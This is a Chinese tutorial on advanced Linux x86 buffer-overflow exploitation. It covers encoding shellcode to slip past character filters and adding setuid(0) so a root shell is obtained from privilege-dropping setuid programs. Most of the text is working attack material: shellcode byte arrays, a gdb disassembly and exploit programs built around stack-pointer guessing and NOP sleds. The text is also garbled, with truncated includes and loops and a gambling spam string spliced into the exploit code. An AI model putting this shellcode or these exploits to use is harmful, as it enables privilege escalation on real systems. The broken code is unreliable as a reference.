



1.介绍

现今存在着好几种缓冲区溢出的代码程序。早期的缓冲区溢出程序功能比较简单,往往是仅仅(通过执行 /bin/sh)得到一个 shell。但是现今的缓冲区溢出程序已具备更多样化的方法,如绕过过滤器限制、建立套接字、突破 chroot 等等。这里我们主要介绍基于(intel x86)Linux 下缓冲区溢出编程中一些较为高级的应用技术。

2.预备常识

你必须懂得汇编语言、C语言还有 Linux。当然,你还必须知道缓冲区溢出是怎么一回事。我们站点上有关于缓冲区溢出的机理分析可供你参考。你也可以从 Phrack 杂志的 49-14 找到有关缓冲区溢出的资料(英文)。

3.绕过过滤器限制

许多程序存在缓冲区溢出问题。但是为什么并非所有的缓冲区溢出程序都能被用于得到 shell 呢?这是由于即使某个程序具备了缓冲区溢出的条件,可能仍旧很难攻击成功。在许多情况下是因为程序过滤了一些字符或者把一些字符转变为另一些字符。如果一个程序过滤了所有的非打印字符,溢出漏洞就几乎无法利用了。但如果程序只过滤了部分的字符,那你可以通过编写巧妙的缓冲区溢出代码来绕过这些过滤机制。:)

3.1 被攻击的例程

vulnerable1.c

----------------------------------------------------------------------------

#include

#include

int main(int argc,int **argv)

{

char buffer[1024];

int i;

if(argc>1)

{

for(i=0;i

#include

#define ALIGN 0

#define OFFSET 0

#define RET_POSITION 1024

#define RANGE 20

#define NOP 0x90

/* Payload used by the section 3 example.  The comment on each element names
 * the i386 instruction encoded by that byte string; the final element is the
 * trailing string operand referenced by the call/pop sequence. */
char shellcode[]=

"\xeb\x38" /* jmp 0x38 */

"\x5e" /* popl %esi */

"\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */

"\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */

"\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */

"\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */

"\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */

"\x89\xf0" /* movl %esi,%eax */

"\x83\xc0\x08" /* addl $0x8,%eax */

"\x89\x46\x08" /* movl %eax,0x8(%esi) */

"\x31\xc0" /* xorl %eax,%eax */

"\x88\x46\x07" /* movb %eax,0x7(%esi) */

"\x89\x46\x0c" /* movl %eax,0xc(%esi) */

"\xb0\x0b" /* movb $0xb,%al */

"\x89\xf3" /* movl %esi,%ebx */

"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */

"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */

"\xcd\x80" /* int $0x80 */

"\x31\xdb" /* xorl %ebx,%ebx */

"\x89\xd8" /* movl %ebx,%eax */

"\x40" /* inc %eax */

"\xcd\x80" /* int $0x80 */

"\xe8\xc3\xff\xff\xff" /* call -0x3d */

"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */

/* /bin/sh is disguised */

/* Returns the current stack pointer.
 *
 * There is no return statement: the inline asm copies %esp into %eax and the
 * function relies on the i386 convention that the return value is whatever is
 * left in %eax.  Reaching the end of a non-void function and using the result
 * is undefined behaviour in standard C; this only works on i386 and only as
 * long as the compiler does not touch %eax after the asm statement. */
unsigned long get_sp(void)

{

__asm__("movl %esp,%eax");

}

main(int argc,char **argv)

{

char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;

long addr;

unsigned long sp;

int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;

int i;

if(argc>1)

offset=atoi(argv[1]);

sp=get_sp();

addr=sp澳门新葡亰8455下载app-offset;

for(i=0;i>8;

buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;

buff[i+ALIGN+3]=(addr&0xff000000)>>24;

}

for(i=0;i

#include

/* Example target for section 4.
 *
 * The effective uid is dropped to the real uid before argv is touched, so a
 * successful overflow only yields the caller's own privileges.  argv[1] is
 * then copied into a fixed 1024-byte stack buffer with strcpy(), i.e. with no
 * length check: an argument longer than the buffer overruns it.  That
 * unbounded copy is the defect the section discusses. */
int main(int argc,char **argv)

{

char buffer[1024];

seteuid(getuid()); /* privilege drop happens before the copy below */

if(argc>1)

strcpy(buffer,argv[1]); /* no bound on the copy length */

}

----------------------------------------------------------------------------

这个程序从一开始就调用 seteuid(getuid())。所以,可以认为后面的"strcpy(buffer,argv[1]);"是没有问题的。因为即使成功地实现了缓冲区溢出攻击,我们也只能获得自己的 shell。不过,如果在 shellcode 中加入含有 setuid(0) 的调用,不就能够获得 root 的 shell 了吗?:)

4.2 编写setuid(0)代码

setuidasm.c

----------------------------------------------------------------------------

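/* Tiny program whose only purpose is to be compiled (statically) and
 * disassembled so the setuid() call sequence can be inspected in gdb; see the
 * transcript that follows.
 *
 * The original used an implicit-int `main()`, which C99 removed; the return
 * type and the exit status are now explicit.  The result of setuid() is
 * deliberately ignored because only the generated code matters here. */
int main(void)

{

(void)setuid(0);

return 0;

}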

----------------------------------------------------------------------------

然后编译和反汇编

----------------------------------------------------------------------------

[ user@host ~ ] {1} $ gcc -o setuidasm -static setuidasm.c

[ user@host ~ ] {2} $ gdb setuidasm

GNU gdb 4.17

Copyright 1998 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License,

and you are

welcome to change it and/or distribute copies of it under

certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty"

for details.

This GDB was configured as "i386-redhat-linux"...

(gdb) disassemble setuid

Dump of assembler code for function __setuid:

0x804ca00 : movl %ebx,%edx

0x804ca02 : movl 0x4(%esp,1),%ebx

0x804ca06 : movl $0x17,%eax

0x804ca0b : int $0x80

0x804ca0d : movl %edx,%ebx

0x804ca0f : cmpl $0xfffff001,%eax

0x804ca14 : jae 0x804cc10

0x804ca1a : ret

0x804ca1b : nop

0x804ca1c : nop

0x804ca1d : nop

0x804ca1e : nop

0x804ca1f : nop

End of assembler dump.

(gdb)

----------------------------------------------------------------------------

setuid(0); code

----------------------------------------------------------------------------

/* The setuid(0) call from the disassembly above as raw i386 machine code:
 * syscall number 0x17 (setuid) in %eax, argument 0 in %ebx, then int $0x80. */
char code[]=

"\x31\xc0" /* xorl %eax,%eax */

"\x31\xdb" /* xorl %ebx,%ebx */

"\xb0\x17" /* movb $0x17,%al */

"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

4.3 改动常规的shellcode

现在只要在常规的 shellcode 的开头处,插入我们的 setuid(0) 代码就得到了一个新的 shellcode。

新的shellcode

----------------------------------------------------------------------------

/* Section 4.3: the setuid(0) sequence from code[] above placed in front of
 * the earlier shellcode.  The comment on each element names the i386
 * instruction encoded by that byte string. */
char shellcode[]=

"\x31\xc0" /* xorl %eax,%eax */

"\x31\xdb" /* xorl %ebx,%ebx */

"\xb0\x17" /* movb $0x17,%al */

"\xcd\x80" /* int $0x80 */

"\xeb\x1f" /* jmp 0x1f */

"\x5e" /* popl %esi */

"\x89\x76\x08" /* movl %esi,0x8(%esi) */

"\x31\xc0" /* xorl %eax,%eax */

"\x88\x46\x07" /* movb %eax,0x7(%esi) */

"\x89\x46\x0c" /* movl %eax,0xc(%esi) */

"\xb0\x0b" /* movb $0xb,%al */

"\x89\xf3" /* movl %esi,%ebx */

"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */

"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */

"\xcd\x80" /* int $0x80 */

"\x31\xdb" /* xorl %ebx,%ebx */

"\x89\xd8" /* movl %ebx,%eax */

"\x40" /* inc %eax */

"\xcd\x80" /* int $0x80 */

"\xe8\xdc\xff\xff\xff" /* call -0x24 */

"/bin/sh"; /* .string \"/bin/sh\" */

----------------------------------------------------------------------------

4.4 攻击程序

用下面的 shellcode,你可以很方便地编写利用代码。

exploit2.c

----------------------------------------------------------------------------

#include

#include

#define ALIGN 0

#define OFFSET 0

#define RET_POSITION 1024

#define RANGE 20

#define NOP 0x90

char shellcode[]=

"\x31\xc0" /* xorl %eax,%eax */

"\x31\xdb" /* xorl %ebx,%ebx */

"\xb0\x17" /* movb $0x17,%al */

"\xcd\x80" /* int $0x80 */

"\xeb\x1f" /* jmp 0x1f */

"\x5e" /* popl %esi */

"\x89\x76\x08" /* movl %esi,0x8(%esi) */
